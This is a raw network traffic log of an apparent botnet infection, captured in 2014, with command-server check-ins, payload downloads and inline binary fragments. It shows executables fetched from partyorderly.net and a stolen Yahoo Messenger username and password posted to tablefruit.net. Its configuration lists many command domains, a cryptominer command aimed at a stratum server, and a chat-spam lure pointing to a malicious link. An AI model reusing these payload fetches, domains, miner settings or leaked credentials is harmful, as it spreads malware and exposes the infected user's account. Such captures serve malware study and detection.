P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 14 May 2012 04:16:44 GMT
Accept-Ranges: bytes
Content-Length: 101376
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28....jj..5j.s.......\F@|.#C>W....H!...4.jR.s5)....#\....F.RW#r....F.
H\.j..-5R.m.).!....F..<#.}..r.KH....\oqR...).....m...6....kr}....f.
\..&.oYl..,......m...6EL}."....u.f.Bo.D..Y...,Q.m..56....Eja.".ef.....
m.YD..,..2.Qm...6.E..."j....f...3.Dm.o....Q....m.6.6q.j.8~.....f..m3..
..c.....m...6..<.qv..8;.f...3........c.Y...%....q.~E8v...;.O......w
.c.;.............v~c.;.........l..w...;[%...?....~..e.c..........wl..;
....[.z..?|....c..}.......%l.......[.....~z.??|.......}.......e...#...
.....?~~^.??........................;~...?~...?xo...s..........wT..;e.
...~..5?....x........|e...p.w_..;....W... .x......5.....|..w...;_....~
x.W?{. .\..O.....|..%...._.......W~}v ?>......O....g....-...o...#~.
..?}.~.>}<O.>......g.....Q........}.xs>....}...>o[g..d.
.[....3.......b.xu&}.:.>....o.O.....[s:..9.....x....u...:..o.qf..8.
[....s...9g...3.u...:........q.<.8q.s..?9..{.g. .3....{....=q..|8.o
..q......g...3.....{m.{.....W....qowD..;].......3....{{s3...R..\.o..p.
wW..;.2..U...*.{..e.s.|..e..\..w...;Wl9...R.U[..*-.s.......\e.-....W.y
..l..U.^;*[...-W=....e......F..u.ly:F...@[^..-....W.r............yu@7.
:..^..-...~W.t3...S......n.u...:@."..m...6....u.t.........G.n..@.|...&
gt;..m...6O.t.....SV..).n..~.....|.im>.v6.a..O0......S...)......|..
F>[email protected].).....M...&n.....x.na...0....o.0.7`x..0l.M...&
..x......B..a.o.0.7....`L.M0&.&..k...>..D......a...0hU`...0LZ..&...
.....k..D5"a...0....hF.L...&ZQ...(.....Dk.X.5.1....h.AN.F GZ....Q...(.
4k.r.5.9.........FA.L. s.Q..E(.....n..r.-.9.q...%A... .{..s....^l.<<< skipped >>>
POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
data=c3Bhd25lZDogJ3dpbjMyZHJrY2xpZW50LmV4ZSAtYSBYMTEgLW8gc3RyYXR1bSt0Y3A6Ly8xMDguMTc0LjE0Ni43ODozMzg4IC11IDNjZDEzNDAwIC1wIHgnDQo=
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:40 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28.............
GET /dep/win32drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:24 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sun, 23 Feb 2014 00:22:10 GMT
Accept-Ranges: bytes
Content-Length: 962048
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...9?.S
.................:....... ...........P....@...........................
......W......... .....................................................
....................................................................`.
...........................text....9.......:..................`.``.dat
a........P.......>[email protected]...`...L...F.........
.....@.`@.bss..................................`..idata...............
[email protected][email protected].... ..
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...................................................&......'.......1.f.
[email protected]..$....
.......$.............N..P.N..T.N..4.N.........=dWM..tm1.......&......$
...........f...<.@[email protected][email protected]?f......j...........
.].........1.......K....v...$..L......1......yt...,.........1.........
..f...,. .N..D$...N..D$...N..D$...N....N..$.N...$..N..D$.........N...,
.........'....U1........WV.U.S....|...0.b...)..D$...........@......@..
....@......@......@......@[email protected]..<<< skipped >>>
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=028&sox=3cd13400&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:15 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28.............
GET /dep/win64drkaesent.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:28 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 24 Feb 2014 22:08:01 GMT
Accept-Ranges: bytes
Content-Length: 2777088
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d......S
.................. ..\*[email protected]
.......*....... .......................................*.......*..$..
..........'...............*..G.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data......... ....... [email protected]...&....!..(
....!.............@.`@.pdata........'.......'[email protected]@.xdata..
......).......(.............@.@@.bss....`b....*.......................
`..edata........*.......)[email protected]@.idata...$....*..&....).....
[email protected].....*.......*.............@[email protected].....*...
....*.............@.`..reloc...G....*..H....*[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ.._@*.......Q@*.......C@*.......I@*.....tg....)...K@*...tH......e
. .H........( ...;@*.H...`*.H..u`*.H....*.....- ..=..!..tf1.H..(......
... ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...- ...- .1.H..(..zt...,.........1............H.
.8...?*.D...?*.L....).H....).H....).....).H....).H.D$ .c. .....).H..8.
........AUATUWVSH......D...?*.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=i.*..........H9...'..........H...H...._*.H..u...._*.1........<<< skipped >>>
GET /forum/search.php?method=setvar&key=connected&value=3e550202&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:16 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28.............
POST /forum/search.php?method=post&type=pha_log&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 447
data=PDwgbGlicHVycGxlIGluaXRpYWxpemVkLg0KPDwgMCxYTVBQDQoxLFlhaG9vDQpTZWxlY3QgdGhlIHByb3RvY29sOiBbMC0xXTogDQo+PiAxCjw8IEVudGVyIHRoZSB1c2VybmFtZTogDQo+PiBtZWwyNV9ybwo8PCBFbnRlciB0aGUgcGFzc3dvcmQ6IA0KPj4gTGZzcjMxMTIjXFxcIgo8PCBDb25uZWN0aW9uIGRpc2Nvbm5lY3RlZDogIm1lbDI1X3JvIiAocHJwbC15YWhvbykNCiAgPkVycm9yOiAyDQo8PCBQVVJQTEVfRElTQ09OTkVDVF9SRUFTT04gSW5jb3JyZWN0IHBhc3N3b3JkDQpQVVJQTEVfQUNDT1VOVF9ESVNDT05ORUNURUQNCgpwaGFudG9tX2Nsb3NlX3BpcGUoKQo=
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:01:15 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28.............
GET /dep/purple.zip HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:45 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 15 Apr 2014 16:05:39 GMT
Accept-Ranges: bytes
Content-Length: 3668564
Content-Type: application/zip
Age: 0
Server: YTS/1.20.28PK..........}Du....,..z.......libgmodule-2.0-0.dll.:.xSU.7m..........E
A...#0..!.qP.P.O[C......&..2.u(I..#.U.Y.o......u.....q..J(.........vv^
l...b-..9.......g..}...s.=..s.9.....H...B....!=.=U.....i...F..>...[
........-.o.8..&.......5 ..n.u....^.K(/..R.e...Y..J..s..8...9C.n... %.
..*.<B.....8j.K.yLo...>......."......c.....tl..B.....c.qB..?a...
..Avuq.....B...k.B.e/.=.I..r.StB.H..Q..&.U..xy.1....CYe...*.Z...;t.Z.o
a.y.. ...."W...x.....l..n.1...Q[...Z.c^.C..Mm.......=A..t.(..s.%.h"|o.
p.,..'x.M|...o........N.}hd.b7&...-......../S..#..7z....o.*._".hL7'...
v...7.FJ.R.....).....~.'[K..H\<..`...>,...u )a@".I..'...5.W.hC.|
![..r...`..1E2...J.%tQ'...eF..L// S?....."...M.s.Y. [email protected].
.3..x.N.....KH$......j....}{.AT\,.....?0_j.&S/....0...c...k...._/.R...
.1..2.l.eT... &`...(1.0..A.............Ul...E.F OG..7..k..`.b}.../V.i.
..q.. ..\...".......{..0.....]....B....P..../.d.b:.G..sf..(...o.......
.oR).Pl.1G.o2....XJlKD.......`.....v.'.aL.rd..D.`..]\J/.|&.......>.
...Z .....>....U........542O..8Qj5dn.7j7...Fj;.....UP...B.&.u...w..
`".....[.^.tU...N..*S...[>F<.L.g3..<......u-.d1.~c6....^...].
....m.. .....:<.t..,M..tW.n.. .pG.y...G.U,.M...D.o..Gd.G..k.rh.h0jz
....SP.wZ...9|..W6.,.g..!..U.{a.!....aW.g.w..1E....L..1..F.C).7.....1.
.....|3.6Z...!N~d..K. ..X....ciZ.....dE..Y~O....9....(.fT=..J>n..T'
......3.N>..7S.m...1.v..a.3..[.\]2./....g.'..G=.m .........N..`....
[email protected]?..9..;Q...... ......Y:........2......$......&f.^[
fB%..l..*.s\.E..,_.r....ZS..,.#..F....m.K..O.t.='.d....jll........<<< skipped >>>
GET /forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3cd13400&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:15 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28.]..=.V9...S.....x.'.L.0.ED.G...dropbox.zip...........................
.......'...[5n.p.....y'>V.(d.t..Uh...f.`.:.o.A.........z."....Z...X
.|[email protected]..)#..#......(....O<$..?....S.).P./.nk<...[.
...P.C#$]i.....].....|x....*`p1....F..7.. H....C.'....L.N V.......U.).
:[email protected]....|....,N..`....*..V.qVm...k...4rk.&..e.......l.
.h^...6*....RSy.>...zh~..t...*.`..^...T..S...a.....0T:..,.4.t7&s..`
.W.~.....!.T..$.tw.5...........a.....(H.....0..p..}C%t....u.. .7..v.9.
../[.Ms..`....k..%...N......G.....|.-o........c....y.V...&Ta.......Jh.
....ZeP1`....o..5..x-...a.5@ .....dr<......gU..a...$..9._....n.!...
...=....Z..5.K.....l...R... .M*r.^../.d.K....k.4..8.#W.U..T...n%T.V...
1.[.D(X.*.......B.w..g....h..S..Zd#..Y>1f.*..$.}.(.Ki.....x.r/E..@.
O.q..............\ a.8I.X%............{...6=:o...\w......3.d...l%W...5
.Ni.........]r.5q.*>Z8LVV.~3......~y....kqY........N .....4z.. ...$
.'.C.C....P(.<..J.Ej......q.......I...*....c. g.....<\.?...N..8.
..>.^...jy$p.g......L.-~.9...=....=.i..3Q.tt..........S....._2_.=..
.W..........rPW...\T.}Gb#.'[email protected]=...ut[4.9.....7./"m'...?....,.
.T...f.q]..............
GET /forum/search.php?method=hostname&host=mail.yahoo.com&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:16 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28..........................
GET /dep/win64drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:16 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 21 Feb 2014 20:25:42 GMT
Accept-Ranges: bytes
Content-Length: 2785792
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...K..S
.................. ..~*..V............@..............................@
.....M/ ....... .......................................*.......*..$..
..........(...............*.8I.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data...`..... ....... [email protected]`....!..b
....!.............@.`@.pdata........(.......'[email protected]@.xdata..
<....0).......).............@.@@.bss.....U...0*....................
...`..edata........*.......)[email protected]@.idata...$....*..&....*..
[email protected].....*......4*.............@[email protected].....*
......6*.............@.`..reloc..8I....*..J...8*[email protected].....
......................................................................
......................................................................
................................................ffffff.........H..(1.f
.=....MZ...Z*........Z*........Z*........Z*.....tg....*....Z*...tH....
..uw .H......... ....Z*.H...s*.H...s*.H....*...... ..=(.!..tf1.H..(...
....-w ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]
.........1.......K...f.H.... .... .1.H..(..zt...,.........1...........
.H..8..&Z*.D../Z*.L....*.H....*.H....*.....*.H....*.H.D$ .sv .....*.H.
.8.........AUATUWVSH......D...Y*.1......H.T$ E..H...H.......eH..%0...1
.H.X.H.=i.*..........H9...'..........H...H....r*.H..u....r*.1.....<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3cd13400 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28304..PhS........tablefruit.net.........8[dOc.E.t?r&..........X..6)].af
/.p.c..............;E..|PG..ot.2.).~...L...m...".........:......[j|"(.
.,....!.Nv8kA.La.whu..........|.w,8...(.~...."....F.VS..,d..7.:.^-...M
.'.<../6~....S0S.Nt<c...I..L.........F..(P..{M..v.........Y...y.
....!.g...\....v...v...tM..q$..W.<.:..f.'.....r..:...4zd...'...._..
...9.......Y[lg5.........L.{..k..........9..........z..._B=.-..,....aX
&.4.....".b..:....sB^.n;.......@>.....i.PR#....'...r!.o.Ho(..8.E...
..k...Bg...m....w|.._.S3.d......1K{.c..Q<.&. n.....'....V.f....;2t.
d...........P..."}...V?U..R....6.c....T.x.......|.}....m...d.W....W...
...PD.....0..S........}.C(....0./...M.|.)'...^|.1.....6.....V V..<.
..G.&.!.....$.g#-..........4..Ks.... ..$4..q..cML.,Y....B.'...Y&.Y-),.
/.....2..a..K.1c.,[email protected].^7 ..|..f.r.{..{...E...
o3X.....F....dg...^.,..z....W@.......$Z.R.y. ..#.z....`....$(.....6...
.!.P..J.p..............s...>....hv.........Wo.[.....Y.K|...A.@.~bd.
.T.6.Mi.|..".m..q....H.L.@..<s....7`....T..>..Q(.;...e ........P
.....B..h..>.\.. [email protected].|.V..........A.....S..%?
...L#...aka........s4..nT....t;.@~..v.We .=........w.,...:.).T...}.tT.
.
GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3cd13400&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:14 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "requireneither
.net" "necessarydress.net" "mightglossary.net" "littleappear.net" "fro
ntride.net" "glasshealth.net" "tablefruit.net" "spendmarry.net" "stick
march.net" "uponloud.net" "rememberpaint.net" "throughcountry.net" "ge
ntlefriend.net" "wrongthrew.net" var_user_ip.513.%kill_jhminer% = "1";
.%set_intercepts% = ""mail.yahoo.com" "partyorderly.net" "/yahoo/" "/c
onfig/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.
%no_password% = "0";.%timer% = "480";.%cpuinfo% = "Intel(R) Core(TM)2
Duo CPU T7700 @ 2.40GHz (2799 MHz)";.%state% = "EN";.%relay_soxid% = "
3e550202";.%send_libpurple_spam% = "Yahoo.mel25_ro.Lfsr3112#\\\".Vreau
sa pun pozele astea pe facebook, crezi ca e ok? %dropbox_link%.zip.2.
33498.20.yahoomessenger.exe.";.%port% = "26334";.%ip% = "93.120.14.25"
;.plugin.55070.miner_forced.80.win32drkclient.exe -a X11 -o stratum tc
p://108.174.146.78:3388 -u 3cd13400 -p x.MZ......................@....
...........................................!..L.!This program cannot b
e run in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4.
..4...4...4...4...4...4...4...4Rich...4................PE..L.....\S...
..................N....................@..............................
...............................................(......................
.................................................@...............(....
........................text...H........................... ..`.rdata.
..!......."..................@[email protected].... .......................<<< skipped >>>
GET /forum/search.php?method=setvar&key=ping&value=828&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:01:16 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28.............
GET /forum/search.php?method=dep&noxor&file=unzip.exe&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:40 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......B
[email protected]...........
................ .....................................................
......................................................................
...........................text...$X.......Z..................`..`.dat
a........p.......^[email protected]..............................
.......idata...............`[email protected]..
............@.........................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U.......$........C..h.....
1.]...U.......$........C..H.....1.]...U......U...$..d.C...]..v...'....
U......U...$..H.C...]..v...'....U..S..$..$..@..}O.......C....$.pB.....
B..M..E......L$..T$..U..T$..D$..pB...K....qB...t^..qB...<.C...t..D$
..Z...$..K....<.C....t....qB..\$..J0..$..K....<.C....t....qB..\$
..JP..$.{K...fK.....qB.....C...4K.....pB......pB...$.\$..L$..........J
....$..N....&....U......]..M.1..u.1.....=..........=....sg=....t....u.
.]...]....D$.......$......J.....t"..t...$......&......'...........<<< skipped >>>
GET /forum/search.php?method=all&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:51 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28ping.5.FLAG cfg.293."limosebast.com" "jinoplasker.com" "uponloud.net"
"tablefruit.net" "gentlefriend.net" "frontride.net" "stickmarch.net" "
throughcountry.net" "rememberpaint.net" "mightglossary.net" "wrongthre
w.net" "glasshealth.net" "necessarydress.net" "spendmarry.net" "little
appear.net" "requireneither.net" var_user_ip.325.%set_intercepts% = ""
mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_ho
st% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%
timer% = "480";.%cpuinfo% = "Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861
MHz)";.%state% = "EN";.%ip% = "89.136.48.189";.%port% = "40190";.%rel
ay_soxid% = "3d90c202";..............
GET /dep/dropbox.zip HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:16 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 28 Apr 2014 05:11:42 GMT
Accept-Ranges: bytes
Content-Length: 6978567
Content-Type: application/zip
Age: 0
Server: YTS/1.20.28PK.........}}C"#[email protected]
..l...\....4c,N...v...[.`.$5wK....~.~..E......A..L.W.C.?.E.....<.z.
s!a..s-V?Em4 ..H....Q..R.u..I..g..r.!.....Z.M..c..\/.Y;..N~..dgf..b..|
...LZ.........c..,V0aR.......R.....L.$"e....'.AW.....q...K.xL.......}T
...`...$ .......S.R...1.K..\0..@..`....L.<...b.J..R.KDRb..b....R".1
BBZM&.y..4.E.G...r...R.g.s...*<aBE.A2..$...R..)y.]....$...L~....C!o
.X.........,[email protected].*.*.&,G ...:.M..2.....z..c.F.5%W.t....X....B.t...#1
3f......,.$!...2.D1b.SN.........xd&.r'.B... T....vI-c.a.l.XJP.....$7..
....k!..q...4.. ...wn....$.~.....n..u....up;...........?...x....I.E.A.
!.7.......F.C.|..h:..0.o.).N..i.|/"../.\..{....'S.K.:Fd.D\.&n8...#7..m
8."..."..._.H..x.i..Q../....;.m.to1.0"/...S._]O.:..=.^x..{1.J6.n0r....
..{....QBB#[email protected].^.D.?,..
..m..x4..."Fd_..E..j...L.p?._iG(:M.....X'.....t.d....`d.......t.V.....
.u j6..a......`.......(.V.V...Z.:.N$.V..."7..JISo......}[email protected].}#.sh..
..G2.'.Tx...(:J..U..K). gO.I)d.......u.q..bMF..p..............<.ZU.
...i..I...Z.}........#.:..%......[Z.I[mVs.o>...NdF...WLv..........|
....z....f.e<.,...,O8..D%*XT..(...f.Q)... u..........R.9..`&......y
..8..#......K.~.}...(..l...O....{H,.[H..%d.'hzvB..~.....x?8....Q...3b)
....V..&.. e..I......I..*......n..{.n.....V..;....{....F.M.n.6.0......
...4....sz4P.Rf.N9<;{cl...Ecca.~.........l...7..IkA.6.....5t.l.....
a...pUU .}..*..../....#..z...1.h.&7.vkm.c....P.G.6!.f...O.*kw..6G.{.WI
.6.M..M#..{p..:.....%.#O...~.m..U..:....#l.x.2J....q.b;..`...wje7.<<< skipped >>>
GET /capacity HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
Host: vcs1.msg.yahoo.com
HTTP/1.1 200 OK
Content-Length: 46
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0, must-revalidate
Expires: Sun, 10 Jun 2007 12:01:01 GMTCOLO_CAPACITY=1..CS_IP_ADDRESS=66.196.121.28....
GET /forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:44 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28...H.....&4Q.hG....[\PhRK..g.D#.purple.zip............................
.....JD.x &....6 .r.jK2e...DN..YM.u.(.q4....}............\......U.^...
[email protected]!j8....F&...w....f.7...Rb;S.u.%"`u5.Ozo...XM... V.....B....#..
.'u.:o.......3...t}.-D.3....,?..[...&W.6.j...m.W......,.P....`...S..i.
..}.D..N../....h..jy.S.cwYR..%.O...E.....}....T.l.O^..&cw_.....>...
......#L....f..Ti.....`......u..... ;..P.._D....3...A..?.n...{...V....
...=6.......OR.........s.*.4H..v......0b........{RF ..i...;..C....i..7
.....<.$.M2.....IG]v..4..=.K.dk.6~.H....}.?.....F.$....[r..E^.r.k..
&.......M ..m.".E..OU...?....e....x..t..]$........^D(>*...Z...&W?.?
.dD.K.........Y....m.MBj/.aJ.K.d........\.PV...'.....$.;.x.....3...%.e
p;I._..M...3........F.."!M.q8...i. 5..w.3./(.J...s.>......Q.X.j..R.
EB.Jr..Z...O.[.M..'Rt../.@{_X={.J.#w.N../..F"fy..ga...c.(...,..g3!..@.
:..|.x.\u [email protected].|........ye.0p..
.>.......X....a..Es..s.f.L_L. [email protected] GC..C.qi.e...$MG~.....
3..>r..../...6..}........K..X.U...1...Z..j........D.Y.....zH..x;m.z
C........T.IX...XMA80.|.c5.~.4n.0....=x.b...{."r.C.O.........*.n..3...
..........
GET /forum/search.php?method=setvar&key=connected&value=3d90c202&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:51 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28.............
.text
`.rdata
@.data
t%UVC
SQSSSh
~RSSSh`
j.hp7L
.hPQ;
tbSSSh
u-SSSh
